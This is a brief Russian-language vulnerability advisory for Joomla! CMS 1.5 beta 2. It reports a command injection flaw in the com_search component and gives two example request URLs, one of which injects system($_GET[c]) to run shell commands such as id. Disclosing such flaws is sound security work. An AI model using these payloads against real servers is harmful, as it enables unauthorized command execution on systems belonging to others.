Программа: Joomla! CMS 1.5 beta 2
Уязвимость позволяет удаленному пользователю выполнить произвольные команды на целевой системе.
Уязвимость существует из-за ошибки в проверке входных данных в компоненте «search». Удаленный пользователь может выполнить произвольные команды на целевой системе.
Пример:
http://$joomlahost/index.php?searchword=";phpinfo();%23&option=com_search&Itemid=1
http://$joomlahost/index.php?c=id&searchword=" ;system($_GET[c]);%23&option=com_search&Itemid=1
